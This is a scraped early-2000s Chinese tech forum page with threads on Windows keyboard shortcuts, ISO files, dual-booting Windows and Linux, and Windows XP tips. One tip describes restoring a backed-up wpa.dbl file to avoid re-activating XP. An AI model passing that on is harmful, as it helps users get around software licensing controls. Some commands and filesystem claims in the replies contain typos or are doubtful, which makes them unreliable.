    显示当前窗口的系统菜单 ALT+空格键

    显示所选项目的快捷菜单 SHIFT+ F10

    显示“开始”菜单 CTRL+ ESC

    显示多文档界面程序的系统

    菜单 ALT+连字号(-)

    粘贴 CTR L+ V

    切换到上次使用的窗口或者

    按住 ALT然后重复按TAB，

    切换到另一个窗口 ALT+ TAB

    撤消 CTRL+ Z

    二、使用“Windows资源管理器”的快捷键

    目的快捷键

    如果当前选择展开了,要折

    叠或者选择父文件夹左箭头

    折叠所选的文件夹 NUM LOCK+负号(-)

    如果当前选择折叠了，要展开

    或者选择第一个子文件夹右箭头

    展开当前选择下的所有文件夹 NUM LOCK+*

    展开所选的文件夹 NUM LOCK+加号(+)

    在左右窗格间切换 F6

    三、使用 WINDOWS键

    可以使用 Microsoft自然键盘或含有 Windows徽标键的其他任何兼容键盘的以下快捷键。

    目的快捷键

    在任务栏上的按钮间循环 WINDOWS+ TAB

    显示“查找：所有文件” WINDOWS+ F

    显示“查找：计算机” CTRL+ WINDOWS+ F

    显示“帮助” WINDOWS+ F1

    显示“运行”命令 WINDOWS+ R

    显示“开始”菜单 WINDOWS

    显示“系统属性”对话框 WINDOWS+ BREAK

    显示“Windows资源管理器” WINDOWS+ E

    最小化或还原所有窗口 WINDOWS+ D

    撤消最小化所有窗口 SHIFT+ WINDOWS+ M

    四、使用“我的电脑”和“Windows资源管理器”的快捷键

    目的快捷键

    关闭所选文件夹及其所有父

    文件夹按住 SHIFT键再单击“关闭按钮（仅适用于“我的电脑”）

    向后移动到上一个视图 ALT+左箭头

    向前移动到上一个视图 ALT+右箭头

    查看上一级文件夹 BACKSPACE

    五、使用对话框中的快捷键

    目的快捷键

    取消当前任务 ESC

    如果当前控件是个按钮，要

    单击该按钮或者如果当前控

    件是个复选框，要选择或清

    除该复选框或者如果当前控

    件是个选项按钮，要单击该

    选项空格键

    单击相应的命令 ALT+带下划线的字母

    单击所选按钮 ENTER

    在选项上向后移动 SHIFT+ TAB

    在选项卡上向后移动 CTRL+ SHIFT+ TAB

    在选项上向前移动 TAB

    在选项卡上向前移动 CTRL+ TAB

    如果在“另存为”或“打开”

    对话框中选择了某文件夹，

    要打开上一级文件夹 BACKSPACE

    在“另存为”或“打开”对

    话框中打开“保存到”或

    “查阅” F4

    刷新“另存为”或“打开”

    对话框 F5

    六、使用“桌面”、“我的电脑”和“Windows资源管理器”快捷键

    选择项目时，可以使用以下快捷键。

    目的快捷键

    插入光盘时不用“自动播放”

    功能按住 SHIFT插入 CD-ROM

    复制文件按住 CTRL拖动文件

    创建快捷方式按住 CTRL+SHIFT拖动文件

    立即删除某项目而不将其放入 SHIFT+DELETE

    “回收站”

    显示“查找：所有文件” F3

    显示项目的快捷菜单 APPLICATION键

    刷新窗口的内容 F5

    重命名项目 F2

    选择所有项目 CTRL+ A

    查看项目的属性 ALT+ ENTER或 ALT+双击

    可将 APPLICATION键用于 Microsoft自然键盘或含有 APPLICATION键的其他兼容键

    七、Microsoft放大程序的快捷键

    这里运用Windows徽标键和其他键的组合。

    快捷键目的

    Windows徽标+PRINT SCREEN将屏幕复制到剪贴板（包括鼠标光标）

    Windows徽标+SCROLL LOCK将屏幕复制到剪贴板（不包括鼠标光标）

    Windows徽标+ PAGE UP切换反色。

    Windows徽标+ PAGE DOWN切换跟随鼠标光标

    Windows徽标+向上箭头增加放大率

    Windows徽标+向下箭头减小放大率

    八、使用辅助选项快捷键

    目的快捷键

    切换筛选键开关右SHIFT八秒

    切换高对比度开关左ALT+左SHIFT+PRINT SCREEN

    切换鼠标键开关左ALT+左SHIFT+NUM LOCK

    切换粘滞键开关 SHIFT键五次

    切换切换键开关 NUM LOCK五秒

Dripping water wears away a stone.
yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-12-12 09:48:36 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
让大家熟悉一下吧~帮你顶一下~

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

len

SlowHorse
积分：1192
发帖：568
来自：hebei
注册：2001-09-29
 发表于 2001-12-12 11:03:22 按此观看len的个人资料 按此发邮件给len len 的 oicq 是3248586,查看 3248586 的资料 发送悄悄话给len 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看len的IP
谢了！
不过，这好像是我的第一百贴了。

Dripping water wears away a stone.
赵鹏

初级用户
积分：9
发帖：1191
来自：福建福州
注册：2001-04-02
 发表于 2001-12-15 23:54:09 按此观看赵鹏的个人资料 按此发邮件给赵鹏 赵鹏 的 oicq 是7070770,查看 7070770 的资料 发送悄悄话给赵鹏 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看赵鹏的IP
Win D
显示桌面

去年元夜时　花市灯如昼　月上柳梢头　人约黄昏后
今年元夜时　月与灯依旧　不见去年人　泪湿青衫袖
edisonsce

初级用户
积分：0
发帖：1
来自：
注册：2001-12-16
 发表于 2001-12-16 14:28:49 按此观看edisonsce的个人资料 按此发邮件给edisonsce edisonsce 的 oicq 是37533048,查看 37533048 的资料 发送悄悄话给edisonsce 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看edisonsce的IP
挺好的，

我来到这个世界只为等待与你的相逢每每心存希望守侯一生却一次又一次的枉费了轮回
sony

终级用户
积分：965
发帖：264
来自：浙江省
注册：2001-10-05
 发表于 2002-01-17 20:42:02 按此观看sony的个人资料 按此发邮件给sony sony 的 oicq 是27869008,查看 27869008 的资料 发送悄悄话给sony 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看sony的IP
可不可以自定义?

许多夜晚，你轻柔地依偎在我的身上，用纤纤秀手触摸我身上娇嫩的地方，用小巧细嘴吸出我珍贵的体液，直到满足十分才肯松口离开，唉，这该死的蚊子。
51windows

海娃
积分：2284
发帖：682
来自：湖南－山东
注册：2001-12-02
 发表于 2002-01-18 08:54:50 按此观看51windows的个人资料 按此发邮件给51windows 访问51windows的主页 51windows 的 oicq 是528173,查看 528173 的资料 发送悄悄话给51windows 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看51windows的IP
sony在上个帖子中说
引用:
可不可以自定义?

在开始菜单中的快捷方式属性中/有个快捷键/输入一个字母或数字，上面会显示ctrl+alt+*,用起来比较好，不好有时候也出现不能用的情况，

为windows的画图做一个快捷方式，这个能很多的用alt+print Screen sysRq键来抓图了！

http://www.blueidea.com/bbs/NewsDetail.asp?id=352362

Blueidea Web Team.
Moderator Of Amphitheater Forum
.::天天学习:好好向上::. www.51windows.com
系统出问题了?请看！

janlay

终级用户
积分：1024
发帖：265
来自：武汉
注册：2001-02-10
 发表于 2002-01-26 20:55:08 按此观看janlay的个人资料 按此发邮件给janlay 访问janlay的主页 janlay 的 oicq 是629489,查看 629489 的资料 发送悄悄话给janlay 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看janlay的IP
在我的电脑中选中文件夹，按Shift+Enter, 以资源管理器打开这个文件夹（增加了文件夹视图）

人面上难分好坏，只要它对你我没有伤害。
话草

终级用户
积分：629
发帖：197
来自：
注册：2001-08-07
 发表于 2002-02-08 09:29:02 按此观看话草的个人资料 按此发邮件给话草 话草 的 oicq 是27721384,查看 27721384 的资料 发送悄悄话给话草 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看话草的IP
另一个工具 winkey 可以实现自定义

另外我加两个 比较使用的 快捷键

一键关机

在桌面的空白处单击鼠标右键，并且新建立一个“快捷方式”，在弹出的创建快捷方式对话窗口中，在“命令行”中输入“RUNDLL32.EXE user,ExitWindows”，然后单击“下一步”按钮，给该快捷方式命名为“一键关机”，这时系统的桌面上就会出现刚才建立的快捷方式了，打开该快捷方式的属性窗口，进入“快捷方式”页，并且给该快捷方式自定义一个快捷功能键，如F11，完成以后，就可以按F11键执行关机命令了。

一键重启

在桌面的空白处单击鼠标右键，并且新建立一个“快捷方式”，在弹出的创建快捷方式对话窗口中，在“命令行”中输入“rundll.exe usre.exe, exitwindowsexec”，然后单击“下一步”按钮，给该快捷方式命名为“一键重启”，这时系统的桌面上就会出现刚才建立的快捷方式了，打开该快捷方式的属性窗口，进入“快捷方式”页，并且给该快捷方式自定义一个快捷功能键，如F12，完成以后，就可以按F12键执行关机命令了。

上一贴 | 下一贴
快速回复 | 主题：Windows快捷键大全（转）
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


ISO的文件怎么办?

计算机技术
ISO的文件怎么办?

上一贴 | 下一贴
发表人 | 主题: ISO的文件怎么办?
amicool 超级用户 积分：425 发帖：149 来自：杭州+温州→浙江→中国 注册：2001-05-28 | 发表于 2001-11-13 17:59:12 按此观看amicool的个人资料 按此发邮件给amicool 访问amicool的主页 amicool 的 oicq 是1315704,查看 1315704 的资料 收藏该主题供以后查看 发送悄悄话给amicool 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看amicool的IP [blue]我下载了一个redhat7.2的文件,是*.iso后缀名的! 不知道怎么办??怎么可以用来安装????[/blue] ◇ Javascript，Lotus Develop，Web-Design…… ◆ わたし------Http://www.amicool.net
Fly Developer 积分：3998 发帖：995 来自： 注册：2001-10-31 | 发表于 2001-11-13 20:13:55 按此观看Fly的个人资料 按此发邮件给Fly Fly 的 oicq 是7969660,查看 7969660 的资料 发送悄悄话给Fly 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Fly的IP ISO，应该是刻录软件生成的，在WINDOW下用WINISO打开试试 我的虚荣心是用十句话说出别人用一本书讲出的东西和别人用一本书没有讲出的东西. ----尼采
darkvn 小混蛋 现任版主 积分：8225 发帖：2542 来自：不是外星 注册：2001-03-02 | 发表于 2001-11-15 17:22:28 按此观看darkvn的个人资料 按此发邮件给darkvn 访问darkvn的主页 darkvn 的 oicq 是2353523,查看 2353523 的资料 发送悄悄话给darkvn 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看darkvn的IP 一般虚拟光驱软件都能读。 Blueidea Web Team Moderator Of Dreamweaver & Javascript
ADSL 终级用户 积分：2969 发帖：668 来自：贫困山区 注册：2001-03-06 | 发表于 2001-11-15 17:46:52 按此观看ADSL的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给ADSL 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ADSL的IP 用这个吧IsoBuster又小又好,呵呵 好好学习，努力做事
上一贴 | 下一贴
快速回复 | 主题：ISO的文件怎么办?
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


多操作系统安装问与答

计算机技术
多操作系统安装问与答

上一贴 | 下一贴
发表人 主题: 多操作系统安装问与答
啸

无意
现任版主
积分：5736
发帖：1962
来自：
注册：2000-08-01
 发表于 2002-01-23 21:44:03 按此观看啸的个人资料 按此发邮件给啸 收藏该主题供以后查看 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
前段时间在论坛里看到一些朋友问关于多操作系统安装的问题，觉得有必要写点什么东西，就理了一下思路，采取问答的方式写了下面的一篇文章，希望能对大家有所帮助。由于水平有限，可能有些东西说得不对，还请大家多多指正。

一、Windows(98、2000、XP)部分

1、问：我有一块新的硬盘，打算在上面装Windows98和Windows XP双操作系统，请问应该怎么分区和安装呢？

答：在新的硬盘上安装多操作系统是比较容易的事，可以省去重新调整分区的麻烦。根据实际情况可以考虑98装在C盘，XP装在D盘，其中C盘不用太大，一般有1~2G就行，如果98不打算用来运行什么大型程序的，500~600M也就够了；相对而言D盘可以留大一些，一般在5G左右，如果空间不够可以考虑减少，但至少要保证有2G的空间。步骤是是先在C盘装98，然后在98里运行XP的安装程序，选择全新安装，并制定安装位置为D盘。这样等XP安装完成后系统就会自动生成一个屏幕菜单，供你启动的时候选择要进的操作系统。对于Win98和Win2000双操作系统的安装方法与本例同。

2、问：我机子上原来装有Win98,我现在想装Win XP,请问98还有必要保留吗，该选择什么样的安装方式呢？

答：在98下安装XP有两种安装供选择，一种是升级式安装，即只对现有操作系统进行升级，安装完成后机子上只有一种操作系统；一种是全新安装，安装完成后机子上有两个操作系统。对于硬盘空间不是很紧张的朋友，建议还是选择全新安装，因为这样可以把98保留下来，万一XP出什么问题了它还可以应急，我觉得这比怎么什么应急工具都强，毕竟它是一个完整的操作系统，而且相比来说占用的空间很小（一个98系统只有两三百兆，而一个XP系统备份文件就有三百多兆）。

3、问：安装Win98和WinXP(Win2000)双操作系统，我的分区分别需要选用什么样的文件系统呢？

答：对于装98的分区，一般都是选用Fat32文件系统，而对于装XP或2000的分区，一般有Fat32和NTFS两种选择，具体选择那种根据实际情况而定，如果98系统还经常使用，则选用Fat32格式，因为NTFS格式的分区在98下无法识别，如果98系统只在极少数情况下才使用，则建议把装XP的分区转成NTFS格式，因为在XP和2000下NTFS比Fat32更有优势。

4、问：在安装多操作系统的时候都会提到boot.ini,能简要介绍这个文件吗？

答：boot.ini是一个包含完成引导过程所需信息的文本文件，用户可在任何文本编辑器中编辑它，其位置一般在激活分区的根目录下（例如C:\）。 我们前面提到的在XP安装完成后出现的屏幕菜单内容就是由它决定的，但是boot.ini的作用不仅仅是为用户提供菜单选项，这个文件是控制操作系统引导过程的一个重要机制。
下面是一个98和XP双操作系统boot.ini的例子：

[boot loader]
timeout=3
default=multi(0)disk(0)rdisk(0)partition(4)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(4)\WINDOWS="Microsoft Windows XP Professional" /fastdetect
C:\="Microsoft Windows"

里面有两部分内容：第一部分[boot loader]包含了超时规定和操作系统的默认路径；第二部分 [operating systems]包含了安装在计算机上的操作系统的路径，其中multi(0)是适配器的顺序号，disk(0)是磁盘参数信息，rdisk(0)是连接到适配器上的磁盘的顺序号，partition(4)是分区号，partition项一般由XP安装的位置决定，如果是安装在C盘，则应该是partition(1)。
对于修改默认的操作系统和倒计秒数的长度，可以启用2000或XP下的“启动和故障恢复”（右击“我的电脑”，切换到“高级”选项卡，里面就有）来完成，不用直接编辑boot.ini文件。

二、Windows和Linux

5、问：我打算在一个新的硬盘上安装Win98,WinXP,Linux三操作系统，应该怎么做呢？

答：步骤大致如下：
(1)分区。除了如问题1提到的为98和XP各预留一个分区以外，还要预留一个空的分区给Linux,大小由硬盘空间大小和linux的用途决定，如果打算用来运行大量程序的可以预留大一点，如果只想用来学习的，可以留小一点，但如果是安装Red Hat Linux 7.0以上的操作系统，所留空间最好不要小于2G.
(2)安装。先在C盘上装98，然后在D盘上装XP，最后再用Linux的安装盘启动，安装Linux.安装Linux时注意选择默认操作系统，如果经常用Windows,就选Dos为默认，反之则选Linux.
(3)启动。三个系统全部安装完毕后重新启动，将会遇到两个屏幕菜单供选择，第一个是 Linux的lilo菜单，选择是进linux还是进Windows,第二个是前面提到的boot.ini控制的菜单，选择是进98还是进XP.

6、问：我的电脑上原来已经装有Win98和Linux,现在我想加装Win XP,请问应该怎么办？

答：很简单，只要你手头上有进Linux的启动盘（一般linux在安装的时候都会提示制作的，如果没有制作或丢失了可以用linux的安装光盘再做一个）。步骤大致如下：
(1)进98，安装XP(全新安装)，安装完以后你会发现原先Linux的lilo屏幕菜单没有了，没关系，进行第二步。
(2)用Linux启动盘启动，以root身份登陆linux,运行一遍lilo命令，重新启动计算机，看，lilo菜单是不是又回来了？问题解决了

7、问：我的电脑上原来已经装有Win2000,装2000的C盘用的是NTFS格式，而其他盘用的是Fat32格式的。后来我又装了Red Had 7.1,装完以后linux能进去，windows却不能进了，请问是什么回事，该怎么解决呢？

答：这里首先要介绍一下Linux系统设备的命名规则。在Linux里，各种设备和分区的命名方法完全不同于Dos,软驱，硬盘以及硬盘分区都有各自的设备特殊文件，例如：

   /dev/hda     表示第一个IDE硬盘（整个）
/dev/hda1    表示第一个硬盘的第一个主分区
/dev/hda2    表示第一个硬盘的第二个主分区
/dev/hda3    表示第一个硬盘的扩展分区
/dev/hda5    表示第一个硬盘的第一个逻辑分区
/dev/hda6    表示第一个硬盘的第二个逻辑分区
/dev/hdb     表示第二个硬盘（整个）

其中hda1对应着Windows里的C盘，而hda5一般对应着Windows的D盘。在linux安装的时候安装程序会自动寻找windows操作系统所在的分区，因为这里我们把C盘设成了NTFS格式的，有些linux安装程序不认这个格式，就把其他fat32格式的盘当作windows的启动盘了，这里应该就是这种情况。
解决的办法也很简单，只要以root身份登陆linux,用文本编辑器打开在/etc目录下的lilo.conf,找到
other=/dev/hda5
optional
label=dos
这一段，把hda5(也可能hda6或其他)改成hda1,存盘，然后运行一遍lilo命令，重新启动，问题应该就能解决了。

8、问：我的机子上原来在C盘装了win98,D盘上装了win XP,后来为了装linux,我用分区魔术师从C盘上分出了两个区，但是当linux装上以后，win xp就不能进了，提示找不到hal.dll文件，请问是什么回事？

答：原因出在boot.ini文件上。正如问题4中提到的，partition表示分区号，原来没有从C盘分出两个区时xp所在的分区号是2（D盘），重新分区以后，XP所在的分区号就应该是4了，但boot.ini文件并不会自动改过来的，所以在启动XP时，引导程序还是跑到第二个分区里区找hal.dll文件，此时第二分区里已经是linux的文件了，当然会提示找不到，所以XP无法启动.解决的办法很简单，只要把boot.ini 里的partition(2)改成partition(4)就行了。

9、问：我在Linux里可以读写Dos分区里的文件吗，应该怎么做？

答：在linux里可以读写Fat32格式的文件，而对NTFS格式的文件只能读，不能写。方法和平常linux文件系统的加载相同。例如我要在linux里读我机子上D盘的内容，我要做的是运行下面的命令来加载D盘的文件系统：

[root@localhost /root]# mkdir /mnt/d
[root@localhost /root]# mount -t msdos /dev/hda5 /mnt/d/

这样当你再访问/mnt下面的d目录时，里面就是你d盘上的内容。

还有一种更简单的方法是在/etc目录下的fstab文件里加上下面这一行(前提是 /mnt/d存在)：
/dev/hda5 /mnt/d msdos defaults 0 0

这样只要一启动linux，系统就会自动加载hda5上的文件系统，我们直接点击 /mnt/d就可以看到d盘上的内容。

上面就是我对多系统安装问题的一些总结，如果还有什么问题的，欢迎跟贴提问。

希望大家也能写些自己在计算机方面的体会和经验，和大家一起共享，这里就算是先抛砖引玉吧

Blueidea Web Team.
Moderator Of Computer Technology Forum
不知道

终级用户
积分：660
发帖：200
来自：
注册：2001-08-17
 发表于 2002-01-23 23:51:43 按此观看不知道的个人资料 按此发邮件给不知道 发送悄悄话给不知道 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看不知道的IP
我正要重装系统，收下了，谢谢。

我要把NTFS格式转为FAT32，上面的数据是否会破坏？

知之为知之，不知为不知！！
len

SlowHorse
积分：1192
发帖：568
来自：hebei
注册：2001-09-29
 发表于 2002-01-24 10:28:39 按此观看len的个人资料 按此发邮件给len len 的 oicq 是3248586,查看 3248586 的资料 发送悄悄话给len 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看len的IP
不知道在上个帖子中说
引用:
我正要重装系统，收下了，谢谢。

我要把NTFS格式转为FAT32，上面的数据是否会破坏？

FAT32转换为NTFS格式,这个过程是不能逆转的.

Dripping water wears away a stone.
不知道

终级用户
积分：660
发帖：200
来自：
注册：2001-08-17
 发表于 2002-01-24 14:19:50 按此观看不知道的个人资料 按此发邮件给不知道 发送悄悄话给不知道 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看不知道的IP
看来为了兼容性还是用FAT32比较好了。

知之为知之，不知为不知！！
浸食·花葬

极度色郎
积分：7374
发帖：2638
来自：|翅膀|
注册：2001-07-09
 发表于 2002-01-24 14:23:23 按此观看浸食·花葬的个人资料 按此发邮件给浸食·花葬 访问浸食·花葬的主页 浸食·花葬 的 oicq 是7368317,查看 7368317 的资料 发送悄悄话给浸食·花葬 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看浸食·花葬的IP
len在上个帖子中说
引用:

FAT32转换为NTFS格式,这个过程是不能逆转的.

格了不就回來了

幕末 ——
京都に人斬り拔刀齋と呼ばれた志士がぃた.
修羅さながらに人を斬り.その血刀を以って新
時代『明治』を切り拓ぃたその男は.動亂の
終結と共に人々の前から姿を消した ——
不知道

终级用户
积分：660
发帖：200
来自：
注册：2001-08-17
 发表于 2002-01-24 16:40:27 按此观看不知道的个人资料 按此发邮件给不知道 发送悄悄话给不知道 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看不知道的IP
浸食·花葬在上个帖子中说
引用:
len在上个帖子中说
引用:

FAT32转换为NTFS格式,这个过程是不能逆转的.

格了不就回來了

格了回来数据还要不要！！

知之为知之，不知为不知！！
wangfeng

高级用户
积分：280
发帖：91
来自：辽宁
注册：2001-12-23
 发表于 2002-01-24 18:21:48 按此观看wangfeng的个人资料 按此发邮件给wangfeng 访问wangfeng的主页 wangfeng 的 oicq 是56202481,查看 56202481 的资料 发送悄悄话给wangfeng 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看wangfeng的IP
NTFS——》FAT32可以随意逆转 用PQ 啊

我曾经问个不休？……？
cfluodongyu2

初级用户
积分：127
发帖：32
来自：
注册：2002-05-18
 发表于 2002-05-18 14:07:22 按此观看cfluodongyu2的个人资料 按此发邮件给cfluodongyu2 cfluodongyu2 的 oicq 是17696170,查看 17696170 的资料 发送悄悄话给cfluodongyu2 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cfluodongyu2的IP
聪明,我们应该多了解一些软件,有很多实用的,一个人找不全的,互相介绍嘛.
NTFS——》FAT32可以随意逆转 用PQ 啊

好的交流能使我们走近完美！
hztcm

初级用户
积分：7
发帖：2
来自：
注册：2002-05-22
 发表于 2002-05-22 07:18:29 按此观看hztcm的个人资料 按此发邮件给hztcm 发送悄悄话给hztcm 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看hztcm的IP
老师：
我在C盘安装了WIN98，在D盘安装了WIN2000，在WIN2000起动后，我无意间用WINDOWS优化大师优化了一下系统，在起动的默认选项里面一不小心选了一个WIN98作为默认起动系统，现在我怎么也不知道怎样去起动WIN2000了。有谁可以告诉我怎么办吗？
多谢！！
在C盘里用WINDOWS优化大师找不到在WIN2000里的那个选项，可能是在FAT格式下不支持这个功能吧，真是要命！WIN2000我是安装的SERVICE版。
啸

无意
现任版主
积分：5736
发帖：1962
来自：
注册：2000-08-01
 发表于 2002-05-22 10:03:01 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
把boot.ini里的内容贴出来看看，我觉得只是被改动了一下下而已，应该不难解决。

Blueidea Web Team.
Moderator Of Computer Technology Forum
xymily

初级用户
积分：66
发帖：32
来自：
注册：2002-03-28
 发表于 2002-05-22 23:14:00 按此观看xymily的个人资料 按此发邮件给xymily 访问xymily的主页 xymily 的 oicq 是7658826,查看 7658826 的资料 发送悄悄话给xymily 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看xymily的IP
有一问题请教：
我的系统是：win2000 adv server,和winxp
由于使用了一条不兼容的内存，导致winxp不能进了。
提示是 [image]:\windows\system32\config\system
的起动失败。要用安装盘或启动盘修复，
但我用了光盘修复。按它的步骤。进入以上目录。不知道做干什么？
请教解决办法

想赢得别人对你的尊重，敬爱
首先靠的是自强。
啸

无意
现任版主
积分：5736
发帖：1962
来自：
注册：2000-08-01
 发表于 2002-05-23 08:39:14 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
一个比较简单的办法是用xp的安装盘进行安装，等系统文件拷完了，第一次重起时，退出安装，应该就可以进xp了。

至于修复，只看过2000的，不知道对xp是否也适用，可以看一下：

http://www.blueidea.com/bbs/NewsDetail.asp?id=372894

Blueidea Web Team.
Moderator Of Computer Technology Forum
xymily

初级用户
积分：66
发帖：32
来自：
注册：2002-03-28
 发表于 2002-05-23 12:37:48 按此观看xymily的个人资料 按此发邮件给xymily 访问xymily的主页 xymily 的 oicq 是7658826,查看 7658826 的资料 发送悄悄话给xymily 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看xymily的IP
但用光盘进行第二次安装的时候，它提示，在我的D盘有别一个系统。
即是原来的WINXP，但提示不进行覆盖，说不推荐在一个盘上有两个系统。
要是重装的话，我怕在我的D盘有两个WINXP.
它不进行文件的复制。而是只能它装在别的盘，或把这个盘的格式转换成ntfs。
再安装，那就不是修复了.

想赢得别人对你的尊重，敬爱
首先靠的是自强。
上一贴 | 下一贴
快速回复 | 主题：多操作系统安装问与答
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


Windows XP技巧十则.

计算机技术
Windows XP技巧十则.

上一贴 | 下一贴
发表人 主题: Windows XP技巧十则.
len

SlowHorse
积分：1192
发帖：568
来自：hebei
注册：2001-09-29
 发表于 2002-01-23 12:16:38 按此观看len的个人资料 按此发邮件给len len 的 oicq 是3248586,查看 3248586 的资料 收藏该主题供以后查看 发送悄悄话给len 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看len的IP
1.关于快速启动工具栏.
快速启动工具栏已从任务栏中小时,如果想找回他,只要在任务栏的空白处右键单击鼠标,在快捷菜单上选择工具栏-快速启动,OK.
2.AVI文件播放冲突.
在98中保存的AVI文件,到了XP中打开,可能会发生冲突.只要打开Windows movie maker,选择查看-选项,取消'自动创建剪辑'项就可以了.
3.锁定计算机.
win2000中的锁定计算机很实用,xp中却找不到了.我们通过建立一个快捷方式就可以实现锁定计算机.在桌面上单击右键,选择新建快捷方式,在命令行框中输入:rundll32.exe user32.dll,LockWorkstation,回车输入快捷方式名称,随便起个名字,完成.
4.有时有些程序我们会经常用到,放在桌面上又显得凌乱.何不把它从开始菜单的程序选项中移到开始菜单的顶部?象windows update一样.只要把鼠标放在想移动的程序链接上,单击鼠标右键,选择'固定在开始菜单上'即可.
5.在关机栏中显示'休眠'.
XP的关机栏中没有了'休眠'选项,我们只要在打开关机对话框的同时,按住shift键,就可以看到休眠选项了.
6.去掉桌面右下角的版本信息.
在桌面空白处单击鼠标右键,选择'属性',点击'桌面'标签,再选择'自定义桌面',在弹出的新窗口中点击'WEB'标签,再'锁定桌面项目'上打勾,按确定.返回桌面属性窗口,按确定.OK.
7.让Windows Messenger不再自动启动.
每次开机,Windows Messenger都会自动启动,在Msconfig中关了也没用.运行regedit,找到HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\MSMSGS主键,将其删掉,重启.OK.
8.避免频繁激活XP.
有时需要重装XP,但激活XP是件麻烦事.我们在第一次激活XP后,将\Windows\system32\下的wpa.dbl文件复制一个作为备份,以后出现需要激活XP的情况,只有把它覆盖同名文件就可以了.
9.用鼠标的滚轮控制网页文字大小.
如果你的鼠标有一个滚轮,在浏览网页时,按住ctrl键,在拨动滚轮,就可以调整网页文字的大小了.
10.禁止自动拨号.
使用XP时,经常会弹出一个自动拨号窗口链接的Internet,怎样关闭它呢?选择开始-设置-控制面板,双击管理工具,在双击服务打开服务列表,找到'Remote Access Auto Connection Manager,双击它打开属性窗口,在'启动类型'中选择'禁用',然后单击下面'服务状态'中的'停止'按钮停止该服务,最后点击确定退出.

Dripping water wears away a stone.
ImHow

怎样
积分：2137
发帖：566
来自：::HowHome::
注册：2002-01-16
 发表于 2002-01-23 12:30:33 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP
在Message的“选项”有选择是否随windows启动而启动

欲说还休
欲说还休
却道天凉好个秋

唯有不断学习 才能不断进步

上一贴 | 下一贴
快速回复 | 主题：Windows XP技巧十则.
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


Word 2000文档如何转换成“帮助”文件

计算机技术
Word 2000文档如何转换成“帮助”文件

上一贴 | 下一贴
发表人 | 主题: Word 2000文档如何转换成“帮助”文件
